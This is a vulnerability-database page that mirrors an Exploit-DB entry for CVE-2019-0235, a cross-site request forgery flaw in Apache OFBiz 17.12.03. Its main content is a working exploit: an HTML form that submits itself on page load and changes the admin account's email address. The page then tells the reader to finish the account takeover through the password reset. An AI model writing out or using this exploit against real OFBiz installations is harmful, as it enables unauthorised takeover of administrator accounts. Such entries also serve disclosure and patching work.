Lucene search
K

Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)

🗓️ 01 May 2020 00:00:00Reported by Faiz Ahmed ZaidiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 567 Views

Apache OFBiz 17.12.03 Cross-Site Request Forgery (Account Takeover) exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Apache OFBiz 17.12.03 Cross Site Request Forgery Vulnerability
2 May 202000:00
zdt
CNVD
Apache OFBiz Cross-Site Request Forgery Vulnerability
7 May 202000:00
cnvd
CVE
CVE-2019-0235
30 Apr 202019:22
cve
Cvelist
CVE-2019-0235
30 Apr 202019:22
cvelist
NVD
CVE-2019-0235
30 Apr 202020:15
nvd
Packet Storm
Apache OFBiz 17.12.03 Cross Site Request Forgery
1 May 202000:00
packetstorm
Prion
Cross site request forgery (csrf)
30 Apr 202020:15
prion
RedhatCVE
CVE-2019-0235
22 May 202510:04
redhatcve
# Exploit Title: Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)
# Exploit Author: Faiz Ahmed Zaidi
# Vendor Homepage: [https://ofbiz.apache.org/security.html]
# Software Link: https://ofbiz.apache.org/download.html#security
# Version: Before 17.12.03
# Tested on: Linux and Windows
# CVE : CVE-2019-0235

#Exploit Code:

<html>
  <body>
    <form action="https://hostipaddress:8443/partymgr/control/updateEmailAddress" method="POST">
      <input type="hidden" name="contactMechId" value="admin" />
      <input type="hidden" name="contactMechTypeId" value="EMAIL&#95;ADDRESS" />
      <input type="hidden" name="partyId" value="admin" />
      <input type="hidden" name="DONE&#95;PAGE" value="viewprofile&#63;party&#95;id&#61;adminâ&#136;&#130;yId&#61;admin" />
      <input type="hidden" name="emailAddress" value="[email protected]" />
      <input type="hidden" name="allowSolicitation" value="Y" />
      <input type="submit" value="Submit request" />
    </form>
	<script>
      document.forms[0].submit();
    </script>
  </body>
</html>

After that do a password reset via forget password.
It's done :)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation